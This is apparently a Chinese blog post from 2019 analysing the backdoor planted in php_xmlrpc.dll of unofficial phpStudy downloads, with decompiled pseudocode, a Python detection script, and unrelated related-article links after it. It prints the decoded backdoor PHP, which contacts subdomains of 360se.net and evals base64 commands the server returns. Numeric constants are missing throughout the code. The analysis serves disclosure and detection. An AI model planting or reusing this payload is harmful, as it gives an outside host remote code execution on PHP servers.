2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件   说是官网下的就没有后门

20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两?

很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件)   用chamd5的检测py

哎~~学个php都被搞哦  跟着大佬团队文章也动手找找后门把

chamd5团队老哥发现是php_xmlrpc.dll中的问题 直接站人家肩膀把  看看这个dll

php_xmlrpc.dll @eval函数

.data:1000DE98

gzuncompress函数解密执行payload 以前webshell大马免杀经常用的函数- -

.data:1000DE98 函数sub_10003490

145-177行:

    while (  )

    {

      if ( *(_DWORD *)v13 ==  )

      {

        v10[v12] = ;

        v43[v12 + ] = *v11;

        v12 += ;

        v13 += ;

      }

      else

      {

        v10[v12++] = *v11;

        v13 += ;

      }

      v11 += ;

      if ( (signed int)v11 >= (signed int)asc_1000C66C )

        break;

      v10 = v43;

    }

    spprintf(&v43, , a_evalSS, aGzuncompress, v43);

    v24 = *(_DWORD *)(*a3 +  * executor_globals_id - );

    v25 = *(_DWORD *)(v24 + );

    *(_DWORD *)(v24 + ) = &v33;

    v40 = v25;

    v26 = setjmp3(&v33, );

    v27 = v40;

    if ( v26 )

    {

      v28 = a3;

      *(_DWORD *)(*(_DWORD *)(*a3 +  * executor_globals_id - ) + ) = v40;

    }

    else

    {

这里@eval    gzuncompress('%s')进行拼接,调用gzuncompress方法解密执行payload,以前webshell大马免杀经常用的函数,上面也看到了函数地址

而gzuncompress解密前的代码是这里的v43

下面是zend_eval_string处执行v43处gzuncompress编码的代码

    }

    else

    {

      v28 = a3;

      zend_eval_string(v43, , &byte_10011B34, a3);

    }

    *(_DWORD *)(*(_DWORD *)(*v28 +  * executor_globals_id - ) + ) = v27;

    if ( dword_1000C010 <  )

      dword_1000C010 += ;

    ftime(&dword_10011D50);

  }

v43处执行的代码通过解码:

@ini_set("display_errors","");

error_reporting();

$h = $_SERVER['HTTP_HOST'];

$p = $_SERVER['SERVER_PORT'];

$fp = fsockopen($h, $p, $errno, $errstr, );

if (!$fp) {

} else {

    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";

    $out .= "Host: {$h}\r\n";

    $out .= "Accept-Encoding: compress,gzip\r\n";

    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);

    fclose($fp);

}

拼接后v43后解密的代码 明显的fsockopen通信 反弹后门到360se.net的20123端口

@ini_set("display_errors","");

error_reporting();

function tcpGet($sendMsg = '', $ip = '360se.net', $port = ''){

    $result = "";

  $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,);

  if( !$handle ){

    $handle = fsockopen($ip, intval($port), $errno, $errstr, );

    if( !$handle ){

        return "err";

    }

  }

  fwrite($handle, $sendMsg."\n");

    while(!feof($handle)){

        stream_set_timeout($handle, );

        $result .= fread($handle, );

        $info = stream_get_meta_data($handle);

        if ($info['timed_out']) {

          break;

        }

     }

  fclose($handle);

  return $result;

}

$ds = array("www","bbs","cms","down","up","file","ftp");

$ps = array("","","","","");

$n = false;

do {

    $n = false;

    foreach ($ds as $d){

        $b = false;

        foreach ($ps as $p){

            $result = tcpGet($i,$d.".360se.net",$p);

            if ($result != "err"){

                $b =true;

                break;

            }

        }

        if ($b)break;

    }

    $info = explode("<^>",$result);

    if (count($info)==){

        if (strpos($info[],"/*Onemore*/") !== false){

            $info[] = str_replace("/*Onemore*/","",$info[]);

            $n=true;

        }

        @eval(base64_decode($info[]));

    }

}while($n);

检查脚本 来自chamd5团队脚本,在phpstudy目录下执行即可递归检查

# -*- coding:utf8 -*-

__author__='pcat@chamd5.org'

__blog__='http://pcat.cc'

import os

import string

import re

def strings(file) :

    chars = string.printable[:94]

    shortestReturnChar = 4

    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)

    pattern = re.compile(regExp)

    with open(file, 'rb') as f:

        return pattern.findall(f.read())

def grep(lines,pattern):

    for line in lines:

        if pattern in line:

            yield line

def pcheck(filename):

    # trojan feature

    trojan='@eval'

    # just check dll file

    if filename.endswith('.dll'):

        lines=strings(filename)

        try:

            grep(lines,trojan).next()

        except:

            return

        print '=== {0} ==='.format(filename)

        for line in grep(lines,trojan):

            print line

    pass

def foo():

    # . stand for current directory

    for path, dirs, files in os.walk(".", topdown=False):

        for name in files:

            pcheck(os.path.join(path, name))

        for name in dirs:

            pcheck(os.path.join(path, name))

    pass

if __name__ == '__main__':

    foo()

自己斟酌哦 太菜了呢学个php都给人家当鸡

2019关于phpstudy软件后门简单分析的更多相关文章

  1. 对魔兽世界、支付宝、Linux三类软件的简单分析

    软工第一次作业: 软件有很多种,如工具类软件.游戏类软件.系统类软件,它们的运行方式也各种各样,如以单机方式运行.以网站方式运行或者以APP方式运行在手机端等,请选取三种软件,分析它们各自的特点. 这 ...

  2. phpstudy后门POC分析和EXP开发

    POC 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被 ...

  3. 一次对php大马的后门的简单分析

    有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次 <?php $password='Shiqi';//登录密码(支持菜刀) //----------功能程序--------- ...

  4. Phpstudy隐藏后门

    Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimizer多款 ...

  5. CSipSimple 简单分析

    简介 CSipSimple是一款可以在android手机上使用的支持sip的网络电话软件,可以在上面设置使用callda网络电话.连接使用方式最好是使用wifi,或者3g这样上网速度快,打起电话来效果 ...

  6. java 中 “文件” 和 “流” 的简单分析

    java 中 FIle 和 流的简单分析 File类 简单File 常用方法 创建一个File 对象,检验文件是否存在,若不存在就创建,然后对File的类的这部分操作进行演示,如文件的名称.大小等 / ...

  7. Xshell高级后门完整分析报告

    Xshell高级后门完整分析报告 from:https://security.tencent.com/index.php/blog/msg/120 1. 前言 近日,Xshell官方发布公告称其软件中 ...

  8. phpStudy隐藏后门预警

    1.事件背景 近日,使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,安恒应急响应中心和研究院随即对国内下载站点提供 ...

  9. CVE-2012-1876:Internet Exporter MSHTML.DLL CaculateMinMax 堆溢出简单分析

    0x01 2012 Pwn2Own 黑客大赛 Pwn2Own 是世界上最著名的黑客大赛,意在激励白帽黑客们进行顶尖的安全研究.在 2012 年 Pwn2Own 大赛上,来自法国著名的安全团队 Vupe ...

随机推荐

  1. jenkins在windows上自动化部署.Net(.Net Core)项目

    前言 什么是持续集成呢?Continuous integration(CI).持续集成是一种软件开发实践,即团队开发成员经常集成他们的工作,通常每个成员至少集成一次,也就意味着每天可能会发生多次集成. ...

  2. c语言的数据类型,运算符,存储类型

    [1词法符号]1. 关键字:32个1) 存储类型:决定(设备)变量的存储位置auto(自动型).extern(外部引用) static(静态型) register(寄存器类型)2) 数据类型:决定设备 ...

  3. 微信小程序删除数组(删除对应指定下标数组中的元素)

    .js 使用arr.splice(id,1)删除 // 删除数组中指定下标 dele_time: function (e) { console.log('删除') console.log(e.curr ...

  4. jqGrid 日期格式化,只显示日期,去掉小时分

    {name:'operateTime',index:'operateTime', formatter:"date", formatoptions: {newformat:'Y-m- ...

  5. commons-beanutils.jar及其支持文件

    下载地址: 链接:https://pan.baidu.com/s/1AtiK3nsk0aBuBfMdNwBVGw 密码:6tul

  6. Spark的Java开发环境构建

    为开发和调试SPark应用程序设置的完整的开发环境.这里,我们将使用Java,其实SPark还支持使用Scala, Python和R.我们将使用IntelliJ作为IDE,因为我们对于eclipse再 ...

  7. 阿里云ESC服务器centos6.9使用及注意事项

    阿里云ESC服务器,配置低,但是足够新手尝试操作练习. 使用之前,注意事项: 选择操作系统 设置实例快照 安装终端工具 一,选择操作系统. 可以在购买服务器的时候进行选择系统盘,也可以在购买之后在实例 ...

  8. Python简单的登录注册代码

    #-*- coding: utf-8 -*- import hashlib # 定义数据库(声明字典) #注册登录的简单hash处理 db={} def get_md5(password): md5= ...

  9. 蓝松SDK - 卡点视频制作介绍

    ---恢复内容开始--- 说明:卡点视频:是指随音频的节拍来不断的切换照片做成的一种 动感视频效果.卡点是卡的音乐中节奏切换的时间点, 在这些时间点上动态切换一个图片, 并给图片做各种动画,从而形成或 ...

  10. 深入了解String,StringBuffer和StringBuilder三个类的异同

    Java提供了三个类,用于处理字符串,分别是String.StringBuffer和StringBuilder.其中StringBuilder是jdk1.5才引入的. 这三个类有什么区别呢?他们的使用 ...